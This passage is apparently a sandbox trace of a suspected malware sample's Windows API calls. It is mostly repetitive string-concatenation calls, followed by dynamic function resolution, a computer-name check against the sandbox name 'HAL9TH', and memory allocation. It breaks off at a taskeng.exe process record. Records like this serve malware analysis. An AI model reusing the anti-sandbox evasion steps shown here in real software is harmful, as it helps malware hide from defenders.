returned="1356126387447744774477447744774477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744774477447744774477447744" [0117.313] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.313] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744774477447744774477447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.313] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.313] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.314] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.314] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.314] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.314] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.314] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744774477447744" [0117.314] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.314] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744774477447744" [0117.314] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.314] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744774477447744" [0117.314] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.314] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744774477447744774477447744" [0117.314] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.314] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744774477447744774477447744" [0117.314] lstrlenA (lpString="NJHOBM29WEI29JU2EV") returned 18 [0117.314] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744774477447744774477447744" [0117.314] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.314] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.314] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.314] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.314] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.314] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.314] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.314] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.314] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.314] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.315] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.315] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.315] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.315] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.315] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.315] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.315] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.315] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.315] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.315] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.315] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.315] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.315] lstrlenA (lpString="35V8XII38TJ6") returned 12 [0117.315] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.315] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.315] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.315] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.315] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.315] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.315] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.315] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.315] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.315] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.316] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.316] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.316] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.316] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.316] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.316] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.316] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.316] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.316] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.316] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.316] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.316] lstrlenA (lpString="HA4T170DHXV") returned 11 [0117.316] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.316] lstrlenA (lpString="8RWCV4B19") returned 9 [0117.316] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.316] lstrlenA (lpString="8RWCV4B19") returned 9 [0117.316] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.316] lstrlenA (lpString="8RWCV4B19") returned 9 [0117.316] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.316] lstrlenA (lpString="8RWCV4B19") returned 9 [0117.316] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.316] lstrlenA (lpString="8RWCV4B19") returned 9 [0117.316] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.317] lstrlenA (lpString="8RWCV4B19") returned 9 [0117.317] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.317] lstrlenA (lpString="8RWCV4B19") returned 9 [0117.317] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.317] lstrlenA (lpString="8RWCV4B19") returned 9 [0117.317] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.317] lstrlenA (lpString="8RWCV4B19") returned 9 [0117.317] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.317] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.317] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.317] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.317] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.317] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.317] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.317] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.317] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.317] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.317] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.317] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.317] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.317] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.317] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.318] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.318] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.318] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.318] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.318] lstrlenA (lpString="8676CPV9GI") returned 10 [0117.318] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.318] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.318] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.318] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.318] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.318] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.318] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.318] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.318] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.318] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.318] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.318] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.318] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.318] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.318] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.318] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.318] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.319] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.319] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.319] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.319] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.319] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.319] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.319] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.319] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.319] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.319] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744774477447744" [0117.319] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.319] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744774477447744" [0117.320] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.320] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744774477447744" [0117.320] lstrlenA (lpString="NIZZ7I7QSXBAOFJW") returned 16 [0117.320] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744774477447744774477447744" [0117.320] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.320] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.320] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.320] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.320] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.320] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.320] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.320] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.320] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.320] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.320] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.320] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.320] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.320] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.320] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.320] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.320] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.320] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.321] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.321] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.321] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.321] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.321] lstrlenA (lpString="RBGW872J8KC8") returned 12 [0117.321] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.321] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.321] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.321] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.321] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.321] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.321] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.321] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.321] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.321] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.321] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.321] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.321] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.321] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.321] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.321] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.321] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.322] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.322] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.322] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.322] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.322] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.322] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.322] lstrlenA (lpString="QLL178JNI1Y3") returned 12 [0117.322] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.322] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.322] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.322] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.322] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.322] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.322] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.322] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.322] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.322] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.322] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.322] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.322] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.322] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.323] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.323] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.323] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.323] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.323] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.323] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.323] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.323] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.323] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.323] lstrlenA (lpString="YOTE77R1WP8U") returned 12 [0117.323] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.323] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0117.323] GetProcAddress (hModule=0x752b0000, lpProcName="LoadLibraryA") returned 0x752c498f [0117.323] GetProcAddress (hModule=0x752b0000, lpProcName="GetProcAddress") returned 0x752c1222 [0117.323] GetProcAddress (hModule=0x752b0000, lpProcName="lstrcatA") returned 0x752e2b4a [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="Sleep") returned 0x752c10ff [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="GetSystemTime") returned 0x752c5a4e [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="ExitProcess") returned 0x752c79c8 [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentProcess") returned 0x752c17e9 [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAllocExNuma") returned 0x75344b4f [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualFree") returned 0x752c184e [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="lstrcmpiW") returned 0x752dd59d [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="LocalAlloc") returned 0x752c166c [0117.324] GetProcAddress (hModule=0x752b0000, lpProcName="GetComputerNameA") returned 0x752db6b8 [0117.324] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76a60000 [0117.325] GetProcAddress (hModule=0x76a60000, lpProcName="GetUserNameA") returned 0x76a8a4b4 [0117.325] GetComputerNameA (in: lpBuffer=0x187ee4, nSize=0x187ee0 | out: lpBuffer="Q9IATRKPRH", nSize=0x187ee0) returned 1 [0117.326] StrCmpCA (pszStr1="Q9IATRKPRH", pszStr2="HAL9TH") returned 9 [0117.326] GetComputerNameA (in: lpBuffer=0x187ee4, nSize=0x187ee0 | out: lpBuffer="Q9IATRKPRH", nSize=0x187ee0) returned 1 [0117.326] StrCmpCA (pszStr1="Q9IATRKPRH", pszStr2="HAL9TH") returned 9 [0117.326] GetComputerNameA (in: lpBuffer=0x187ee4, nSize=0x187ee0 | out: lpBuffer="Q9IATRKPRH", nSize=0x187ee0) returned 1 [0117.326] StrCmpCA (pszStr1="Q9IATRKPRH", pszStr2="HAL9TH") returned 9 [0117.326] GetCurrentProcess () returned 0xffffffff [0117.327] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x7d0, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x210000 [0117.327] VirtualAlloc (lpAddress=0x0, dwSize=0x17c841c0, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000 Process: id = "9" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x42a7a000" os_pid = "0xf48" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x368" cmd_line = "taskeng.exe 